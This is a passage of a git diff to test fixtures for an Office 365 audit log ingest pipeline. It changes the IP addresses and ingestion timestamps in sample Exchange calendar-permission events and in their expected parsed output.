ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -278,12 +278,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "DB3PR0102MB3500", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -332,7 +332,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -348,8 +348,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695637Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659946600Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -370,12 +370,12 @@ }, { "server": { - "address": "15.20.207.31", + "address": "67.43.156.13", "domain": "DB7PR01MB4428", - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -424,7 +424,7 @@ "related": { "ip": [ "::1", - "15.20.207.31" + "67.43.156.13" ] }, "organization": { @@ -440,8 +440,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695638800Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659952200Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -462,12 +462,12 @@ }, { "server": { - "address": "15.20.207.31", + "address": "67.43.156.13", "domain": "DB7PR01MB4428", - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -516,7 +516,7 @@ "related": { "ip": [ "::1", - "15.20.207.31" + "67.43.156.13" ] }, "organization": { @@ -532,8 +532,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695640400Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659957700Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -554,12 +554,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "DB3PR0102MB3500", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -608,7 +608,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -624,8 +624,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695642Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659963600Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -646,12 +646,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -700,7 +700,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -716,8 +716,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695643600Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659969200Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -738,12 +738,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -792,7 +792,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { @@ -808,8 +808,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695645500Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659974700Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json index ce157ae57e6..ef899784e41 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json @@ -57,10 +57,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"[2001:db8::abcd]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" }, "o365audit": { - "ClientIP": "[2001:db8::abcd]:12345", + "ClientIP": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345", "CreationTime": "2020-02-17T17:12:03", "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "RecordType": -1 @@ -68,10 +68,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"2001:db8::abcd\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" + "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" }, "o365audit": { - "ClientIP": "2001:db8::abcd", + "ClientIP": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "CreationTime": "2020-02-17T17:12:03", "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "RecordType": -1 @@ -79,10 +79,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"[2001:db8::abcd]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" }, "o365audit": { - "ClientIP": "[2001:db8::abcd]", + "ClientIP": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]", "CreationTime": "2020-02-17T17:12:03", "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "RecordType": -1 diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json index fdd79e1b1b9..dc54941893b 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json @@ -26,7 +26,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-06-17T07:32:54.058002800Z", + "ingested": "2021-12-09T13:42:43.978949100Z", "original": "{\"ClientIP\":\"[10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -71,7 +71,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": 